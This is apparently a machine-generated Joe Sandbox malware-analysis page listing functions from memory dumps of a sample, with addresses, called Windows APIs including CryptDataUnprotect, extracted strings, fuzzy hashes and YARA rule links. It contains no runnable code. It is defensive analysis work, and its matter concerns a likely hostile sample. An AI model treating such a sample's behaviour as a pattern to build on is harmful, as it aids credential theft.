Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: ;:54$J$r
API String ID: 834300711-2889753551
Opcode ID: 247f5444feefe8fb496bdb23cdaff0cb524b50165e3c316ac8cc13a050d5b8a0
Instruction ID: af1a48f0db5de6386f12844ce49aa5129ffef80fb38895460ec19465d6d79b93
Opcode Fuzzy Hash: 247f5444feefe8fb496bdb23cdaff0cb524b50165e3c316ac8cc13a050d5b8a0
Instruction Fuzzy Hash: 12D135B1A083408FD724CF28C8917AFB7E1EF96304F04892DE4DA9B352E7749945CB96

Function 00070D90 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(000740E0,005C003F,00000002,00000018,?), ref: 00070DBE

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 000741F0 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a02709bb3f2f350b1411dd5311bb4a47065670796a17c5ca0b49d1542d6064aa
Instruction ID: 66fe82a6e9556f29a536636fd0c45721c7ff03895097a4872853b1c2b6b09c22
Opcode Fuzzy Hash: a02709bb3f2f350b1411dd5311bb4a47065670796a17c5ca0b49d1542d6064aa
Instruction Fuzzy Hash: 33418A35B44300AFE7544A689CC1B3AB7E6BF98704F19802CEA895B361D775AC14C785

Function 00070CC0 Relevance: 1.6, APIs: 1, Instructions: 79
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,00000000), ref: 00070D59

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e825a2c53453dadd4770fd72efee26aaf26592c2c891dfcf7ad5bdd9b1d29d76
Instruction ID: eed72951ee836550eeee68caa0fbc40e0204c06c01029f609765ba3c5c9c6169
Opcode Fuzzy Hash: e825a2c53453dadd4770fd72efee26aaf26592c2c891dfcf7ad5bdd9b1d29d76
Instruction Fuzzy Hash: CC016F71E16252CBE3249B75DC9492B7BD5EFC9341F18896CE48867111D6349C4583A2

Function 0006DC40 Relevance: 1.5, APIs: 1, Instructions: 49
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 0006DCCD

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: bb90839da195210f5f2b4b2d97da377a6288a733198d4d03e157953531694a76
Instruction ID: 6d0c2ed5e991f20cbca0e303eddbb38375c72ba608c50359cc53191c49f0c5d3
Opcode Fuzzy Hash: bb90839da195210f5f2b4b2d97da377a6288a733198d4d03e157953531694a76
Instruction Fuzzy Hash: E60197BB69C3584FD7006F91EC986A6BBA5EFD0304F04803DD6C446641CAFF2909C742

Function 026393EE Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(?,00000002), ref: 026393F6

Memory Dump Source

Source File: 00000007.00000002.2180398037.0000000002630000.00000040.00001000.00020000.00000000.sdmp, Offset: 02630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2630000_pdf.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 31d001c5fe492f1083b4b0c44a2d63d3be7a2749a4305411a6e696e725cacb7b
Instruction ID: ac435a21c27755e5835eb0555ceacd2ef0059db8fd89cc13b73971c33070e0e3
Opcode Fuzzy Hash: 31d001c5fe492f1083b4b0c44a2d63d3be7a2749a4305411a6e696e725cacb7b
Instruction Fuzzy Hash: A3B0127318000CB7CA000A42EC0AFE73F1DD7123E6F018012F5094846087331460E570

Non-executed Functions

Function 0003D500 Relevance: 10.2, Strings: 8, Instructions: 218COMMON

Download Yara Rule

Strings

sp$., xrefs: 0003D69D
*#1/, xrefs: 0003D602
x|.", xrefs: 0003D5DA
)vBW, xrefs: 0003D572
9&!:, xrefs: 0003D5EA
&%9b, xrefs: 0003D5F2
x, xrefs: 0003D64A
s$>%, xrefs: 0003D5E2

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID: &%9b$)vBW$*#1/$9&!:$s$>%$sp$.$x$x|."
API String ID: 0-2964809603
Opcode ID: e15111653fabfa8ae9ca1ff26d6d509ab9527342194df1257f5b8c1e77c5e471
Instruction ID: 9743f0ecfe49aceb119fc93c48b7601bee6fc7f4ea61ebc937c971252ef5245c
Opcode Fuzzy Hash: e15111653fabfa8ae9ca1ff26d6d509ab9527342194df1257f5b8c1e77c5e471
Instruction Fuzzy Hash: 1E51F47410C3C08BD356CF2994A136BBFE1AF93305F1859ADE4E54B391D27A880ACB62

Function 0005AA40 Relevance: 6.8, Strings: 5, Instructions: 523COMMON

Download Yara Rule

Strings

D4'2, xrefs: 0005B66E
;:54, xrefs: 0005B75C
3L,S, xrefs: 0005B67E
gw, xrefs: 0005B4BF
t|, xrefs: 0005B4CF

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID: 3L,S$;:54$D4'2$gw$t|
API String ID: 0-148604455
Opcode ID: ea698640677df648175d300225dc06297facf451efb9542036dc5b9ded2db328
Instruction ID: a0c008c60fea8ccec7327275ab6ff8aeeae8981ad0b7bce5bda256c7ae5c20d3
Opcode Fuzzy Hash: ea698640677df648175d300225dc06297facf451efb9542036dc5b9ded2db328
Instruction Fuzzy Hash: 74F115B59083408FE7249F24D85166BBBE1FFC5315F048A2CE9C99B391EB79D905CB82

Function 0004ECDE Relevance: 6.8, Strings: 5, Instructions: 521COMMON

Download Yara Rule

Strings

;:54, xrefs: 0004F209
;:54, xrefs: 0004ED36
;:54, xrefs: 0004F169
;:54, xrefs: 0004F0B7
;:54, xrefs: 0004EF8C

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: ;:54$;:54$;:54$;:54$;:54
API String ID: 2994545307-1306776023
Opcode ID: 6fecd8b2d6c940eb779459ee60bd2dbf1803bb4a6a32df1dfa81b3cf54ace613
Instruction ID: 13848be3adc1650ae62b2af4be46be40ac7fb72d5a5db8bfc3e14bf62e363aed
Opcode Fuzzy Hash: 6fecd8b2d6c940eb779459ee60bd2dbf1803bb4a6a32df1dfa81b3cf54ace613
Instruction Fuzzy Hash: A4F118B2A48380CBD7788B14D88177BB7E6FB86710F18893CD5C667252D379DC418B8A

Function 00051B40 Relevance: 4.4, Strings: 3, Instructions: 657COMMON

Download Yara Rule

Strings

s}, xrefs: 00051C18
;:54, xrefs: 00051C79
;:54, xrefs: 00051CEE

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: ;:54$;:54$s}
API String ID: 2994545307-2837035532
Opcode ID: 6adf63aa6b32031b71c3638af88f9d1268271341b8ceee786adbd6034b6d6702
Instruction ID: 6bb5b482d0ed1bbadd81e9cbe9f2317974276d214253169b38d04afb4d1fe297
Opcode Fuzzy Hash: 6adf63aa6b32031b71c3638af88f9d1268271341b8ceee786adbd6034b6d6702
Instruction Fuzzy Hash: 0C22EEB16083408BE764DF14C881BAFB7E2FFC6741F14882CE9C59B291E775A949CB52

Function 0003E8DE Relevance: 3.8, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

:g;1, xrefs: 0003E8DE
%!-0, xrefs: 0003E906
j, xrefs: 0003E91D

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID: %!-0$:g;1$j
API String ID: 0-565037024
Opcode ID: 3c0f06cbe11ca8aa35204f975129ae916ae0ad80f1f98dca839c9bddce6f9b36
Instruction ID: 18f666f1e87c80174444235915829dbce86e5ae975576ba716dc18e781b55009
Opcode Fuzzy Hash: 3c0f06cbe11ca8aa35204f975129ae916ae0ad80f1f98dca839c9bddce6f9b36
Instruction Fuzzy Hash: EE11C1606193C0CBD3928F25D45032BFBE4AB82714F585E5DE0D66B291D374C9468B82

Function 0003E996 Relevance: 3.8, Strings: 3, Instructions: 25COMMON

Download Yara Rule

Strings

%!-0, xrefs: 0003E9C6
j, xrefs: 0003E9DD
:g;1, xrefs: 0003E99E

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID: %!-0$:g;1$j
API String ID: 0-565037024
Opcode ID: fa23b5c8106c8b6eb18a1e5e27922acec8cb3fb0240a5a66eefb843f2f12593b
Instruction ID: 868029835001daf4b4e92f61f58dd8be69e41504544d5a228b30a85c14fa6394
Opcode Fuzzy Hash: fa23b5c8106c8b6eb18a1e5e27922acec8cb3fb0240a5a66eefb843f2f12593b
Instruction Fuzzy Hash: 7BF017B00193808BD7529F29955151FFFE0FBD6218F906F5CE0E66B291D3B1C60A8B4B

Function 0005E400 Relevance: 1.6, Strings: 1, Instructions: 382COMMON

Download Yara Rule

Strings

", xrefs: 0005E6E8

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 5bf47c763a04bd179ee3fd492d585bad88f45428f3080de9e3c3009377e89902
Instruction ID: 3a5b721d8d1310841dd90e990e2f0747c6d0cd829d21b0311819c9e81f6d7af1
Opcode Fuzzy Hash: 5bf47c763a04bd179ee3fd492d585bad88f45428f3080de9e3c3009377e89902
Instruction Fuzzy Hash: 7CC1F7B1A083955BD729CE24C49076BB7E9AB84351F18892DECD987382EB34DE4CC7D1

Function 0006F7E0 Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

InA>, xrefs: 0006F8A0

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID: InA>
API String ID: 2994545307-2903657838
Opcode ID: 8c94ab586b1e90792ab516982845555968a40c21c6a2bb2b0d78c7dadbf62a32
Instruction ID: 2cf7a8b0ac3a32c37e10d91a7508279f4fb57516307fbea3a408d11d0e45f3f1
Opcode Fuzzy Hash: 8c94ab586b1e90792ab516982845555968a40c21c6a2bb2b0d78c7dadbf62a32
Instruction Fuzzy Hash: 28710472A08302AFD764CE28D884B3ABBE3BBC4310F28852CE9D587355D6759C058792

Function 0005E870 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0005EA6E

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: a2ed5d5d1777cecdaacd439e3f7b9d28fdb70e92d2c625c7c77b2516d757c171
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 63710C32A083954BDB68CE28C48431FB7E2ABC5711F19896DECD987391D734EE4D8782

Function 000733B0 Relevance: .7, Instructions: 672COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e2904f74ce7ef53bd09ee439d7f60f3fd0e945e56a43dccdbf89a5fe5472de8
Instruction ID: c18a621070d5128db58583f64a06bd1ac0e855efb620b6ce700fd7563ba7b51d
Opcode Fuzzy Hash: 1e2904f74ce7ef53bd09ee439d7f60f3fd0e945e56a43dccdbf89a5fe5472de8
Instruction Fuzzy Hash: 4612DE36F04215CFDB08CF68D8912AEB7F2BB89314F19817DD85AE7381D639A941CB90

Function 000732C0 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ae9ef681563ea1159ecec42a4393bfca82c74d6215c50f2640e04a4df889d8c
Instruction ID: 74135d0898fde1a6fed30de5a70eb84de660800efa4631c3b0a74a53741f6929
Opcode Fuzzy Hash: 2ae9ef681563ea1159ecec42a4393bfca82c74d6215c50f2640e04a4df889d8c
Instruction Fuzzy Hash: 81020F35E05216CFDB18CF68D8906AEB7F2FB89314F19847DC94AA7341D739A942CB90

Function 00035820 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a181758c6eb2bb2da5c322730a7ed12b8b0798d2c913d7b643c8bad4c5da992c
Instruction ID: 46633a3a5df5cd81cf0e8fb4f5d742de450ef58df97636a85d7059759c386190
Opcode Fuzzy Hash: a181758c6eb2bb2da5c322730a7ed12b8b0798d2c913d7b643c8bad4c5da992c
Instruction Fuzzy Hash: E951B4B4A047019FC715DF18C880926B7E9FF89325F19466DF8999B3A2DB31EC41CB92

Function 00074380 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ebadb006b961bb4d1e2fe58bc4c71ae3a3a505195839ed9867c2e67600e9d8e3
Instruction ID: ad003862fd49555a9533707323483dbdc21a85a6e821021d6fc8e09e428b4902
Opcode Fuzzy Hash: ebadb006b961bb4d1e2fe58bc4c71ae3a3a505195839ed9867c2e67600e9d8e3
Instruction Fuzzy Hash: DB418635B80310ABE7648B58DCC1B3AB7E2FF88704F18902CEA895B3A1D774AC04D385

Function 0006B170 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8e7a2fe98f5a170e0e3d6717616bf8e1678f7f684d66e559dd35818da5c8879
Instruction ID: 0482220180f1f289fa9eed57fc48198c8ccd625fb0db8e1af9e8b55424767955
Opcode Fuzzy Hash: b8e7a2fe98f5a170e0e3d6717616bf8e1678f7f684d66e559dd35818da5c8879
Instruction Fuzzy Hash: 0E3146B6B443056BE710AA64AC92E6FB7DBABC4754F044428FD84D7253F735EC4083A2

Function 0004C6E0 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70451e8966c4d27f70b0391e9a33f2fc4e1106f89f58946d84cdbf6e909eddc4
Instruction ID: 83cab01176e4eb3f613dd26348c906c59345267f47c380fc51a332ac527dcc77
Opcode Fuzzy Hash: 70451e8966c4d27f70b0391e9a33f2fc4e1106f89f58946d84cdbf6e909eddc4
Instruction Fuzzy Hash: 194116B45053009BE3649F14C842FEBB7E4EF86720F044A2CF9959B2D1E774D941CBA6

Function 0003C960 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e39b47d5e8a9fdadff90607e363d12ddf690496f365585e828c43316a0f8579
Instruction ID: 51e0af5d4640c4ec0740aafd09f5166da645e9d73c8b5bd55637806e880f4636
Opcode Fuzzy Hash: 2e39b47d5e8a9fdadff90607e363d12ddf690496f365585e828c43316a0f8579
Instruction Fuzzy Hash: 07313A298496F546E333C93D84A086DBFD06E57268B9942EEC8F15F783C5428D8693E2

Function 0004C8CE Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

